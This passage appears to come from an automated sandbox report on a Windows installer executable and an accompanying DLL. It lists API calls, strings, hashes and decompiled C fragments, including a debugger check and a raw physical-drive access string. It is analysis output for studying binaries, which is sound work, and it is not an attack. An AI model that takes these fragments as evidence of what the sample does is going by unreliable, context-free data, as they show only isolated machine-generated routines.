                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 3081802084-2935326385
                                                                                                                                                                  • Opcode ID: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
                                                                                                                                                                  • Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
                                                                                                                                                                  • Opcode Fuzzy Hash: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
                                                                                                                                                                  • Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,00000000,.unverified,?,?,?,?), ref: 004134C4
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?), ref: 004134EB
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,?), ref: 0041354B
                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00413556
                                                                                                                                                                    • Part of subcall function 0043740C: GetFileAttributesW.KERNEL32(004125A6,?,?,?,00000001,80004005,00000000), ref: 00437488
                                                                                                                                                                    • Part of subcall function 0043740C: GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 0043749B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                                                  • API String ID: 457978746-2528915496
                                                                                                                                                                  • Opcode ID: 2cedae98c789e87417e67e658899332d430a0458b6f1c64e6e7fc651a14e29c2
                                                                                                                                                                  • Instruction ID: ab651e69853393a668d77da66f97a7cc02ec4ba4900980d1524a3a165d9222cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cedae98c789e87417e67e658899332d430a0458b6f1c64e6e7fc651a14e29c2
                                                                                                                                                                  • Instruction Fuzzy Hash: A141653090056CAADF21AF64DC49BEE77B9AF44716F5001A6E509E10A1EB789FC48F5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2054405381-1522884404
                                                                                                                                                                  • Opcode ID: c72dd54c3adadfc8993b462ccf1a1ff414198a969e37ccbfcf6ab88439cfec3e
                                                                                                                                                                  • Instruction ID: 535dcb1110c6f9425801d7be22377e4e91bb77f3c55e3d018168205d3a37cd66
                                                                                                                                                                  • Opcode Fuzzy Hash: c72dd54c3adadfc8993b462ccf1a1ff414198a969e37ccbfcf6ab88439cfec3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4001C431A003286AC710AF65AC49B9F77B8AB08714F10026BE855F21C1DBB8A9004AE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                                  				void* _v804;
                                                                                                                                                                  				intOrPtr _v808;
                                                                                                                                                                  				intOrPtr _v812;
                                                                                                                                                                  				intOrPtr _t6;
                                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                                  				intOrPtr _t12;
                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                  				long _t17;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				intOrPtr _t22;
                                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                                  				intOrPtr* _t31;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  
                                                                                                                                                                  				_t27 = __esi;
                                                                                                                                                                  				_t26 = __edi;
                                                                                                                                                                  				_t25 = __edx;
                                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                                  				_t21 = __ebx;
                                                                                                                                                                  				_t6 = __eax;
                                                                                                                                                                  				_t34 = _t22 -  *0x103342d8; // 0x1cc83ef6
                                                                                                                                                                  				if(_t34 == 0) {
                                                                                                                                                                  					asm("repe ret");
                                                                                                                                                                  				}
                                                                                                                                                                  				 *0x10335a58 = _t6;
                                                                                                                                                                  				 *0x10335a54 = _t22;
                                                                                                                                                                  				 *0x10335a50 = _t25;
                                                                                                                                                                  				 *0x10335a4c = _t21;
                                                                                                                                                                  				 *0x10335a48 = _t27;
                                                                                                                                                                  				 *0x10335a44 = _t26;
                                                                                                                                                                  				 *0x10335a70 = ss;
                                                                                                                                                                  				 *0x10335a64 = cs;
                                                                                                                                                                  				 *0x10335a40 = ds;
                                                                                                                                                                  				 *0x10335a3c = es;
                                                                                                                                                                  				 *0x10335a38 = fs;
                                                                                                                                                                  				 *0x10335a34 = gs;
                                                                                                                                                                  				asm("pushfd");
                                                                                                                                                                  				_pop( *0x10335a68);
                                                                                                                                                                  				 *0x10335a5c =  *_t31;
                                                                                                                                                                  				 *0x10335a60 = _v0;
                                                                                                                                                                  				 *0x10335a6c =  &_a4;
                                                                                                                                                                  				 *0x103359a8 = 0x10001;
                                                                                                                                                                  				_t11 =  *0x10335a60; // 0x0
                                                                                                                                                                  				 *0x1033595c = _t11;
                                                                                                                                                                  				 *0x10335950 = 0xc0000409;
                                                                                                                                                                  				 *0x10335954 = 1;
                                                                                                                                                                  				_t12 =  *0x103342d8; // 0x1cc83ef6
                                                                                                                                                                  				_v812 = _t12;
                                                                                                                                                                  				_t13 =  *0x103342dc; // 0xe337c109
                                                                                                                                                                  				_v808 = _t13;
                                                                                                                                                                  				 *0x103359a0 = IsDebuggerPresent();
                                                                                                                                                                  				_push(1);
                                                                                                                                                                  				E10013ABF(_t14);
                                                                                                                                                                  				SetUnhandledExceptionFilter(0);
                                                                                                                                                                  				_t17 = UnhandledExceptionFilter(0x10024b30);
                                                                                                                                                                  				if( *0x103359a0 == 0) {
                                                                                                                                                                  					_push(1);
                                                                                                                                                                  					E10013ABF(_t17);
                                                                                                                                                                  				}
                                                                                                                                                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016225
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 10016268
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                  • Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
                                                                                                                                                                  • Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000208,?), ref: 00438B5C
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00438B6E
                                                                                                                                                                  Strings
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 00438BB7
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00438B45
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                  • API String ID: 1772835396-395410266
                                                                                                                                                                  • Opcode ID: ca1f085078c8bc5d16458a2eb3c968707acf354a7bb0194c974e8212e4c22fc9
                                                                                                                                                                  • Instruction ID: ab43bc886ecf86c0864305c02f8c3e2d20b1707547bddd00f58b6d06ebc6c0d1
                                                                                                                                                                  • Opcode Fuzzy Hash: ca1f085078c8bc5d16458a2eb3c968707acf354a7bb0194c974e8212e4c22fc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 02212CA6500118BED7249F998C05FBBB3FCEB4CB02F00455AB955E2080E73C9E84D774
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(000011FF,?,?,00000000,00000000,00000000,00000001,80070656,?,?,?,00417568,00000000,?,00000000,80070656), ref: 00433DDA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00417568,00000000,?,00000000,80070656,?,?,0040E644,?,00401EA4,80070656,?,0000000D), ref: 00433DE7
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00417568,00000000,?,00000000,80070656,?,?,0040E644,?), ref: 00433E2E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 1365068426-3612885251
                                                                                                                                                                  • Opcode ID: 2d3f061fff02a033c8bf439855db3169dc9b95852cc97fdf58f3ecdcd0e5acfc
                                                                                                                                                                  • Instruction ID: 2b85e3b520cc7d2352d92ecd6ed289095840e56d667e2d4df0cc6dff098bd8c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d3f061fff02a033c8bf439855db3169dc9b95852cc97fdf58f3ecdcd0e5acfc
                                                                                                                                                                  • Instruction Fuzzy Hash: 91016172900224FFDB159FA5CD09AEFBAA8EF08741F00026ABD01E6250E7748F00DBE4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy working folder., xrefs: 004139CB
                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 0041398D
                                                                                                                                                                  • Failed create working folder., xrefs: 004139A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                  • API String ID: 1238063741-2072961686
                                                                                                                                                                  • Opcode ID: dece842e5f6ad299a177502bd1ddac92c63a6d24ff5a9a0866a2ef16b50cdcd3
                                                                                                                                                                  • Instruction ID: 920975fd333c1df61f61d6ebe0802c88bb4f6d606bb86a46988b8e681d9456c3
                                                                                                                                                                  • Opcode Fuzzy Hash: dece842e5f6ad299a177502bd1ddac92c63a6d24ff5a9a0866a2ef16b50cdcd3
                                                                                                                                                                  • Instruction Fuzzy Hash: 1301B572A10624F68B125B55DC02EDFBAB4DF90766B21021BF404B6110D779AF40A68C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0041DA19,00000000,00000003), ref: 0041DA8D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041DA19,00000000,00000003,00000000,?), ref: 0041DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set service start type., xrefs: 0041DAC5
                                                                                                                                                                  • msuengine.cpp, xrefs: 0041DABB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                  • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                                  • API String ID: 1456623077-1628545019
                                                                                                                                                                  • Opcode ID: 9e0e60fda5ccdaba4477b58cf4fb1791dd43f3ef0f647c00aa6fe5177fd04018
                                                                                                                                                                  • Instruction ID: b638a06f3bd6bc898a062da12c482c45dc8c1fb2173a821c029bd0e72ee5cfdd
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e0e60fda5ccdaba4477b58cf4fb1791dd43f3ef0f647c00aa6fe5177fd04018
                                                                                                                                                                  • Instruction Fuzzy Hash: FBF0EC3264523076A720266A7C09F8B7AD8DF057B1F110326FD28F51D0D615881085EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44);
                                                                                                                                                                  				if(GetLastError() == 0x7a) {
                                                                                                                                                                  					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                                  					E1000CF80(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                                  					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0);
                                                                                                                                                                  					_v8 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                  • _memset.LIBCMT ref: 1001983E
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 895502402-0
                                                                                                                                                                  • Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  • String ID: r@
                                                                                                                                                                  • API String ID: 1617791916-2414136952
                                                                                                                                                                  • Opcode ID: 27603959ac93e92ab12e130dc1de55ed8a309b1abcac35a5ec106f94884394f8
                                                                                                                                                                  • Instruction ID: 6a65b5887fb60cc33f906c3bce9d62b865568e391402b1ae6fdd150e0b4a65d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 27603959ac93e92ab12e130dc1de55ed8a309b1abcac35a5ec106f94884394f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FC012325A020DAB8B006FF8EC0ED9F7BACEB286027008620BA05C2010C738E0108BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: GetProcAddress$LoadLibraryExA$aryExA
                                                                                                                                                                  • API String ID: 0-2920269711
                                                                                                                                                                  • Opcode ID: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                  • Instruction ID: 064fd1153f8023e2d8d6ffac232408c3d35e74f450f08e449ac5c8fe529035d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f3a92986eaf651c49b717ac3ce8e463752147d74b3af29585d1c9e67a8752a7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B71C370D08288DFDB05CFD8C594BDEBBF1AF49308F148149D545AB386C3BA6A49CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436280: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00436125,?), ref: 004362F1
                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00436149
                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0043615A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2114926846-0
                                                                                                                                                                  • Opcode ID: 141180ea11910da5b0ca1bd6e9f7952084086db8161ce3211e13d302a449127a
                                                                                                                                                                  • Instruction ID: ed331b5a3d06f4ceeac5f9abb4b754c501ee129c5542153bbbecdb30ced4b4fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 141180ea11910da5b0ca1bd6e9f7952084086db8161ce3211e13d302a449127a
                                                                                                                                                                  • Instruction Fuzzy Hash: 69117C7190031ABBEF10DFA4CD84AAFB7B8FF08344F51542EA501A6241D7789A00CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E100153D6(void* __eax, void* __ebx, void* __edx) {
                                                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                                                  
                                                                                                                                                                  				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                                                                                  				_t8 = SetUnhandledExceptionFilter(E1001158A());
                                                                                                                                                                  				 *0x10335948 = 0;
                                                                                                                                                                  				return _t8;
                                                                                                                                                                  			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 100153E4
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100153EB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1958600898-0
